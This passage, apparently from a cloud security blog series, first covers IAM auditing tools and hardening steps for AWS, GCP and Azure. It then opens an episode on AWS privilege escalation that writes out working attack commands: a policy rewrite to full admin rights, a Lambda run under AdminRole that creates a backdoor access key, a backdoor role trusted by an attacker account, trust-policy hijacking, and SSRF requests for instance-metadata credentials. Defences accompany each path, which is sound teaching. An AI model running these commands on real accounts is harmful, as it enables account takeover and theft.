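The result names the patterns that no observed call needed, here the DynamoDB and Lambda grants. Note that s3:* survives this check because it matched something; it still needs narrowing to the two actions actually called.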

Access Analyzer also identifies external sharing you may not have intended:

# Find resources shared outside the account or organization
aws accessanalyzer create-analyzer \
  --analyzer-name account-analyzer \
  --type ACCOUNT

aws accessanalyzer list-findings \
  --analyzer-arn arn:aws:accessanalyzer:ap-south-1:123456789012:analyzer/account-analyzer \
  --filter '{"status":{"eq":["ACTIVE"]}}' \
  --output table
# Shows: S3 buckets, KMS keys, Lambda functions accessible from outside the account

And validates new policies before you apply them:

# Run this in CI/CD before any IAM policy gets merged
aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")'

# Exit non-zero if findings exist — fail the pipeline
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')
[ "$FINDINGS" -eq 0 ] || { echo "IAM policy has $FINDINGS security findings"; exit 1; }

CloudTrail for Targeted Investigation

When you need to understand what a specific role has been doing in detail:

# What API calls has LambdaImageProcessor made in the last 30 days?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=LambdaImageProcessor \
  --start-time "$(date -d '30 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output json | jq '.Events[] | {time:.EventTime, event:.EventName, source:.EventSource}'

# All IAM changes in the last 7 days — track who changed what
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventSource,AttributeValue=iam.amazonaws.com \
  --start-time "$(date -d '7 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output table

Open Source Tooling

For a more comprehensive scan across an account:

# Prowler — runs hundreds of checks including IAM-specific ones
pip install prowler
prowler aws --profile default --services iam --output-formats json html

# Key IAM checks:
# iam_root_mfa_enabled
# iam_user_no_setup_initial_access_key
# iam_policy_no_administrative_privileges
# iam_user_access_key_unused → finds keys unused for 90+ days
# iam_role_cross_account_readonlyaccess_policy

# ScoutSuite — multi-cloud auditor with a report UI
pip install scoutsuite
scout aws --profile default --report-dir ./scout-report

GCP IAM Auditing

IAM Recommender — Automated Right-Sizing

GCP’s IAM Recommender analyses 90 days of activity and surfaces specific suggestions: “replace roles/editor with roles/storage.objectViewer.” It tells you exactly what to change, not just that something needs changing:

# List IAM recommendations for a project
gcloud recommender recommendations list \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --format=json | jq '.[] | {
    principal: .description,
    current_role: .content.operationGroups[].operations[] | select(.action=="remove") | .path,
    suggested_role: .content.operationGroups[].operations[] | select(.action=="add") | .value
  }'

# Mark a recommendation as applied (required to track progress)
gcloud recommender recommendations mark-succeeded RECOMMENDATION_ID \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --etag ETAG

In practice, I run IAM Recommender across all GCP projects in a quarterly review. The recommendations don’t age out — GCP continues to track them until you address them or explicitly dismiss them. Dismissed without action counts as a decision; it should be documented.

Policy Analyzer — Answering Access Questions

When you need to understand who has access to a specific resource, and why:

# Who can access a specific BigQuery dataset?
gcloud asset analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//bigquery.googleapis.com/projects/my-project/datasets/customer_analytics" \
  --output-partial-result-before-timeout

# What can a specific principal do in this project?
# Replace SERVICE_ACCOUNT_EMAIL with the service account's full email address
gcloud asset analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//cloudresourcemanager.googleapis.com/projects/my-project" \
  --identity="serviceAccount:SERVICE_ACCOUNT_EMAIL"

Finding Public Exposure

# Org-wide scan for allUsers or allAuthenticatedUsers bindings
gcloud asset search-all-iam-policies \
  --scope=organizations/ORG_ID \
  --query="policy.members:allUsers OR policy.members:allAuthenticatedUsers" \
  --format=json | jq '.[] | {resource: .resource, policy: .policy}'

Run this in every new environment you inherit. The results reliably surface data exposure incidents waiting to happen — public GCS buckets, publicly readable BigQuery datasets, APIs exposed to any authenticated Google account.
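For a large organization the JSON output is long, so it helps to reduce it to one row per public binding. A minimal Python sketch, assuming each search result carries a resource string and a policy with a bindings list of role and members, as in the jq projection above; public_bindings and the sample data are hypothetical:

```python
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}


def public_bindings(results: list) -> list:
    """Return (resource, role, member) for every binding open to the public."""
    hits = []
    for item in results:
        for binding in item.get("policy", {}).get("bindings", []):
            for member in binding.get("members", []):
                if member in PUBLIC_MEMBERS:
                    hits.append((item["resource"], binding["role"], member))
    return hits


# Invented sample shaped like the search output.
SAMPLE_RESULTS = [
    {
        "resource": "//storage.googleapis.com/example-public-bucket",
        "policy": {"bindings": [
            {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
            {"role": "roles/storage.admin", "members": ["user:owner@example.com"]},
        ]},
    },
]

exposed = public_bindings(SAMPLE_RESULTS)
```

Each tuple in exposed is one finding to triage: the resource, the role that is public, and which of the two public principals holds it.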


Azure IAM Auditing

Defender for Cloud — Baseline Recommendations

# Get IAM-related security recommendations
az security assessment list --output table | grep -i -E "(identity|mfa|privileged|owner)"

# Check specific conditions:
# "MFA should be enabled on accounts with owner permissions on your subscription"
# "Deprecated accounts should be removed from your subscription"
# "External accounts with owner permissions should be removed from your subscription"

Azure Resource Graph — Bulk Role Assignment Queries

Azure Resource Graph lets you query RBAC assignments across the entire tenant in a single call — essential for large Azure estates:

# All role assignments — who has what, where
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| extend principalId = properties.principalId,
         roleId = properties.roleDefinitionId,
         scope = properties.scope
| project scope, principalId, roleId
| limit 500" \
--output table

# Find Owner assignments within subscriptions (high-risk); startswith also matches resource-group and resource scopes
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| where properties.roleDefinitionId endswith '8e3af657-a8ff-443c-a75c-2fe8c4bcb635'
| where properties.scope startswith '/subscriptions/'
| project scope, properties.principalId" \
--output table
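The startswith filter in the second query matches every scope beneath a subscription, including resource groups and individual resources. If you export the rows as JSON, a small post-filter can keep only assignments made directly at subscription scope. A minimal Python sketch, assuming each row is a dict with a scope key; the function name and sample IDs are placeholders:

```python
import re

# Exactly "/subscriptions/<id>", with an optional trailing slash.
SUBSCRIPTION_SCOPE = re.compile(r"^/subscriptions/[^/]+/?$", re.IGNORECASE)


def at_subscription_scope(assignments: list) -> list:
    """Keep only role assignments whose scope is the subscription itself."""
    return [a for a in assignments if SUBSCRIPTION_SCOPE.match(a["scope"])]


# Placeholder rows shaped like the query projection.
ROWS = [
    {"scope": "/subscriptions/SUB_ID", "principalId": "PRINCIPAL_A"},
    {"scope": "/subscriptions/SUB_ID/resourceGroups/rg-app", "principalId": "PRINCIPAL_B"},
]

subscription_owners = at_subscription_scope(ROWS)
```

Only the first row survives, since the second assignment is scoped to a resource group inside the subscription.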

Entra ID Access Reviews — Automated Re-Certification

Access reviews send notifications to resource owners or users asking them to confirm that access is still appropriate. When someone doesn’t respond — or responds “no” — the access is removed:

# Create a quarterly access review for subscription Owner assignments.
# defaultDecisionEnabled + defaultDecision "Deny": if no response, access is removed.
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/identityGovernance/accessReviews/definitions" \
  --body '{
    "displayName": "Quarterly Subscription Owner Review",
    "scope": {
      "query": "/subscriptions/SUB_ID/providers/Microsoft.Authorization/roleAssignments",
      "queryType": "MicrosoftGraph"
    },
    "reviewers": [{"query": "/me", "queryType": "MicrosoftGraph"}],
    "settings": {
      "mailNotificationsEnabled": true,
      "justificationRequiredOnApproval": true,
      "autoApplyDecisionsEnabled": true,
      "defaultDecisionEnabled": true,
      "defaultDecision": "Deny",
      "instanceDurationInDays": 7,
      "recurrence": {
        "pattern": {"type": "absoluteMonthly", "interval": 3},
        "range": {"type": "noEnd"}
      }
    }
  }'

The defaultDecision: Deny setting is the key. Access reviews that default to preserving access on non-response don’t actually remove anything. They just document that nobody reviewed it. Defaulting to revocation means inaction removes access, which is the correct behavior for privileged roles.
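The effect of the default is easiest to see on a small example. This Python sketch is a toy model of one review cycle, not the Entra ID implementation; apply_review and the principal names are hypothetical. Anyone without a recorded response receives the default decision.

```python
def apply_review(assignments: list, responses: dict, default_decision: str = "Deny") -> list:
    """Return the principals who keep access after one review cycle."""
    kept = []
    for principal in assignments:
        # Missing response: fall back to the configured default.
        decision = responses.get(principal, default_decision)
        if decision == "Approve":
            kept.append(principal)
    return kept


owners = ["alice", "bob", "carol"]
responses = {"alice": "Approve", "bob": "Deny"}  # carol never responded

kept_with_deny = apply_review(owners, responses, default_decision="Deny")
kept_with_approve = apply_review(owners, responses, default_decision="Approve")
```

With a Deny default only alice keeps access. With an Approve default carol keeps it too, even though nobody reviewed her assignment.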


The Hardening Workflow

The methodology I apply when auditing any cloud IAM configuration:

Step 1: Inventory Everything

You cannot audit what you don’t know exists.

# AWS: full IAM snapshot in one call
aws iam get-account-authorization-details --output json > iam-snapshot-$(date +%Y%m%d).json
# Contains: all users, groups, roles, policies, attachments — everything

# GCP: export the IAM policies attached to IAM-relevant assets
gcloud asset export \
  --project=my-project \
  --content-type=iam-policy \
  --output-path=gs://audit-bucket/iam-snapshot-$(date +%Y%m%d).json \
  --asset-types="iam.googleapis.com/ServiceAccount,cloudresourcemanager.googleapis.com/Project"

Step 2: Classify by Function

Group identities by purpose: human engineering access, CI/CD pipelines, application workloads, data pipelines, monitoring/audit. Each class has an expected permission profile. Anything outside the expected profile for its class is a finding.

A Lambda function with iam:* is not in the expected profile for application workloads. An EC2 instance role with s3:DeleteObject on * deserves a question. A CI/CD pipeline role with secretsmanager:GetSecretValue warrants understanding what secrets it actually needs.
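The classification check can be sketched in a few lines of Python. Everything here is an assumption for illustration: the class names, the EXPECTED_SERVICES profiles, and the out_of_profile helper are hypothetical, and a real profile would come from your own inventory. An action counts as a finding when its service prefix is outside the profile for the identity's class.

```python
# Hypothetical expected service profiles per identity class.
EXPECTED_SERVICES = {
    "application": {"s3", "dynamodb", "logs", "sqs"},
    "ci-cd": {"ecr", "ecs", "s3", "cloudformation"},
}


def out_of_profile(identity_class: str, actions: list) -> list:
    """Return actions whose service prefix is not expected for this class."""
    allowed = EXPECTED_SERVICES[identity_class]
    return sorted(a for a in actions if a.split(":", 1)[0].lower() not in allowed)


lambda_actions = ["s3:GetObject", "logs:CreateLogGroup", "iam:*"]
deviations = out_of_profile("application", lambda_actions)
```

For the Lambda example, deviations contains only iam:*, which is the permission that deserves a question.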

Step 3: Find Unused Permissions

Apply the tools:
  • AWS: Access Analyzer generated policies + Last Accessed Data
  • GCP: IAM Recommender
  • Azure: Defender for Cloud recommendations + sign-in activity analysis

For any permission unused in 90 days: document whether it’s still needed (rare operation, incident response capability) or can be removed.

Step 4: Right-Size Policies

Replace broad permissions with specific ones:

// Before: attached AmazonS3FullAccess to a read-only service
{
  "Action": "s3:*",
  "Effect": "Allow",
  "Resource": "*"
}

// After: only what the service actually calls
{
  "Action": ["s3:GetObject", "s3:ListBucket"],
  "Effect": "Allow",
  "Resource": [
    "arn:aws:s3:::app-assets-prod",
    "arn:aws:s3:::app-assets-prod/*"
  ]
}

Every wildcard you remove is attack surface eliminated. Not conceptually — concretely.
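Finding the statements that still need this treatment can be automated. A minimal Python sketch, assuming policies are loaded as dicts with a Statement key; wildcard_statements is a hypothetical helper, and BEFORE and AFTER wrap the two fragments above. It flags Allow statements with a bare or service-wide wildcard action, or a bare wildcard resource.

```python
def as_list(value):
    """IAM allows a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def wildcard_statements(policy: dict) -> list:
    """Return indexes of Allow statements with a broad Action or Resource."""
    flagged = []
    for i, stmt in enumerate(as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = as_list(stmt.get("Action", []))
        resources = as_list(stmt.get("Resource", []))
        broad_action = any(a == "*" or a.endswith(":*") for a in actions)
        broad_resource = any(r == "*" for r in resources)
        if broad_action or broad_resource:
            flagged.append(i)
    return flagged


BEFORE = {"Statement": [{"Action": "s3:*", "Effect": "Allow", "Resource": "*"}]}
AFTER = {"Statement": [{
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Effect": "Allow",
    "Resource": ["arn:aws:s3:::app-assets-prod", "arn:aws:s3:::app-assets-prod/*"],
}]}

before_flags = wildcard_statements(BEFORE)
after_flags = wildcard_statements(AFTER)
```

The before policy is flagged and the after policy is clean. The object-level ARN ending in /* is not treated as a finding because it is still pinned to one bucket.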

Step 5: Add Conditions as Guardrails

Conditions constrain how permissions are used even when they can’t be removed:

// Require MFA for sensitive operations. Scope this to human principals: it denies every request made without MFA, including long-term access keys and service roles
{
  "Effect": "Deny",
  "Action": ["iam:*", "s3:Delete*", "ec2:Terminate*", "kms:*"],
  "Resource": "*",
  "Condition": {
    "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" }
  }
}

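// Restrict all non-service API calls to the corporate network.
// aws:SourceIp is evaluated against the caller's public IP, so list your public egress CIDRs
// (203.0.113.0/24 is a documentation placeholder). RFC 1918 ranges never match this key;
// for requests that arrive through VPC endpoints, use aws:VpcSourceIp instead.
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "NotIpAddress": { "aws:SourceIp": ["203.0.113.0/24"] },
    "Bool": { "aws:ViaAWSService": "false" }   // allow calls an AWS service makes on your behalf (e.g., CloudFormation, Athena)
  }
}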
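The network guardrail combines two condition operators, and IAM requires all operators in a `Condition` block to match before the statement applies. A rough model of that logic, assuming hypothetical corporate egress CIDRs and ignoring everything else IAM evaluates:

```python
from ipaddress import ip_address, ip_network

# Hypothetical public egress ranges (documentation address space).
CORPORATE_CIDRS = ["203.0.113.0/24", "198.51.100.0/24"]


def deny_applies(source_ip, via_aws_service, allowed_cidrs=CORPORATE_CIDRS):
    """Model the Deny: NotIpAddress AND ViaAWSService == false must both hold."""
    outside_network = not any(
        ip_address(source_ip) in ip_network(cidr) for cidr in allowed_cidrs
    )
    return outside_network and not via_aws_service


print(deny_applies("203.0.113.10", via_aws_service=False))  # inside the network
print(deny_applies("192.0.2.5", via_aws_service=False))     # outside, direct call
print(deny_applies("192.0.2.5", via_aws_service=True))      # outside, but via a service
```

Working through the three cases by hand before deploying a Deny like this is worthwhile: a mistake in the condition logic locks out legitimate callers account-wide.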

Step 6: Build It Into CI/CD

IAM configuration changes that aren’t reviewed before they reach production will drift. Make the validation automatic:

# Pre-merge check in CI — catches wildcards and dangerous permissions before they land
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://changed-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')

if [ "$FINDINGS" -gt 0 ]; then
  echo "❌ IAM policy has $FINDINGS security findings — see below"
  aws accessanalyzer validate-policy --policy-document file://changed-policy.json \
    --policy-type IDENTITY_POLICY | jq '.findings[]'
  exit 1
fi

Step 7: Schedule Regular Reviews

IAM audit is not a one-time project. Build a cadence:

  • Weekly: Access Analyzer findings, IAM Recommender dismissals, new cross-account trust relationships
  • Monthly: Unused access keys report, inactive service accounts
  • Quarterly: Access reviews for privileged roles, full policy inventory review
  • On offboarding: Immediate review of departing engineer’s direct permissions and any roles whose trust policies name them

Quick Wins Checklist

| Check | AWS | GCP | Azure |
|---|---|---|---|
| No active root / global admin credentials | GetAccountSummary → AccountAccessKeysPresent: 0 | N/A | Check Entra ID conditional access |
| MFA on all human privileged accounts | IAM Credential report | Google 2FA enforcement | Conditional Access policy |
| No inactive credentials older than 90 days | Credential report LastRotated | SA key age | Entra ID sign-in activity |
| No policies with Action:* or Resource:* on write | Access Analyzer validate | N/A | Azure Policy |
| No public-facing storage | S3 Block Public Access | constraints/storage.publicAccessPrevention | Storage account public access disabled |
| Machine identities use roles, not static keys | Audit for access key creation on roles | iam.disableServiceAccountKeyCreation | Use Managed Identity |
| Permissions verified against actual usage | Access Analyzer generated policy | IAM Recommender | Defender for Cloud recommendations |

Framework Alignment

| Framework | Reference | What It Covers Here |
|---|---|---|
| CISSP | Domain 6: Security Assessment and Testing | IAM auditing is a core cloud security assessment activity: finding over-permission before attackers do |
| CISSP | Domain 7: Security Operations | Continuous IAM right-sizing is an operational discipline requiring tooling, cadence, and ownership |
| ISO 27001:2022 | 5.18 Access rights | Periodic review of access rights; this episode is the practical implementation of that control |
| ISO 27001:2022 | 8.2 Privileged access rights | Reviewing and right-sizing elevated permissions; detecting unused privileged access |
| ISO 27001:2022 | 8.16 Monitoring activities | Continuous IAM monitoring, CloudTrail analysis, and automated anomaly detection |
| SOC 2 | CC6.3 | Access removal processes: Access Analyzer, IAM Recommender, and Access Reviews are the tooling for CC6.3 |
| SOC 2 | CC7.1 | Threat and vulnerability identification: unused permissions are latent attack surface, identifiable and removable |

Key Takeaways

  • The average cloud identity uses less than 5% of its granted permissions — the 95% excess is attack surface, not just waste
  • AWS Access Analyzer generates a least-privilege policy from CloudTrail data — run it on every Lambda role, ECS task role, and EC2 instance profile quarterly
  • GCP IAM Recommender surfaces role right-sizing suggestions based on 90-day activity — they don’t expire until you address them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build IAM policy validation into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

What’s Next

EP10 covers cross-system identity federation — OIDC, SAML, and the trust relationships that let a single IdP authenticate users and workloads across cloud platforms, SaaS applications, and organizational boundaries. Understanding how federation works is also understanding how it can be exploited when trust is too broad.

Next: SAML vs OIDC federation


AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Reading Time: 10 minutes





TL;DR

  • Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
  • iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
  • iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
  • iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
  • Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
  • Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.


Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise, and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a misconfigured web application firewall, reached the EC2 instance metadata service, and retrieved temporary credentials for the instance’s IAM role. That role could list and read S3 buckets far beyond anything a firewall needed, including the buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.


The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.


Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters

# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("USER_EMAIL"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"

# Azure: establish context
az account show
az role assignment list --assignee USER_EMAIL --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.


AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now allows every action on every resource (the equivalent of
# AdministratorAccess) for every principal it is attached to

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json

# index.py (packaged in payload.zip)
import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    # Return only JSON-serializable fields: the raw response includes a datetime (CreateDate)
    return {"buckets": [b['Name'] for b in buckets['Buckets']],
            "key_id": key['AccessKey']['AccessKeyId']}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}
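To see what the scoped `Resource` pattern buys you, it helps to test role ARNs against it. The sketch below approximates IAM's wildcard matching with `fnmatchcase`; the role name `LambdaExecutionRole-orders` is hypothetical, and real policy evaluation involves far more than this one comparison.

```python
from fnmatch import fnmatchcase

SCOPED_RESOURCE = "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"


def can_pass(role_arn, resource_patterns):
    """True if any Resource pattern in the PassRole statement covers the role ARN."""
    return any(fnmatchcase(role_arn, pattern) for pattern in resource_patterns)


execution_role = "arn:aws:iam::123456789012:role/LambdaExecutionRole-orders"
admin_role = "arn:aws:iam::123456789012:role/AdminRole"

print(can_pass(execution_role, [SCOPED_RESOURCE]))  # intended use still works
print(can_pass(admin_role, [SCOPED_RESOURCE]))      # the Path 2 attack is blocked
print(can_pass(admin_role, ["*"]))                  # what Resource: * would allow
```

The naming prefix only protects you if privileged roles can never be created under it, so pair the pattern with control over who can create roles matching `LambdaExecutionRole-*`.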

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.
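Because the addition is easy to miss by eye, a trust policy change is better reviewed as a set difference of principals. A minimal sketch, assuming the old and new trust policies are available as dictionaries (for example from a change event and a stored baseline); the function names are illustrative.

```python
def trusted_principals(trust_policy):
    """Collect (kind, value) pairs from every Allow statement's Principal."""
    principals = set()
    for stmt in trust_policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if isinstance(principal, str):  # e.g. "*"
            principals.add(("Any", principal))
            continue
        for kind, values in principal.items():
            for value in values if isinstance(values, list) else [values]:
                principals.add((kind, value))
    return principals


def added_principals(before, after):
    """Principals trusted by the new policy that the old one did not trust."""
    return sorted(trusted_principals(after) - trusted_principals(before))


ec2_stmt = {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"}
attacker_stmt = {
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"},
    "Action": "sts:AssumeRole",
}
before = {"Version": "2012-10-17", "Statement": [ec2_stmt]}
after = {"Version": "2012-10-17", "Statement": [ec2_stmt, attacker_stmt]}
print(added_principals(before, after))
```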

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}
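The reason IMDSv2 defeats simple SSRF becomes clearer when the two requests are written out. The sketch below only constructs the requests with Python's standard library and never sends them; `MyAppRole` comes from the example above, and the helper names are illustrative.

```python
from urllib.request import Request

IMDS_BASE = "http://169.254.169.254"


def token_request(ttl_seconds=21600):
    """Step 1: a PUT with a TTL header. Most SSRF bugs can only issue plain GETs."""
    return Request(
        f"{IMDS_BASE}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def credentials_request(token, role_name):
    """Step 2: the GET is only honored when it carries the session token header."""
    return Request(
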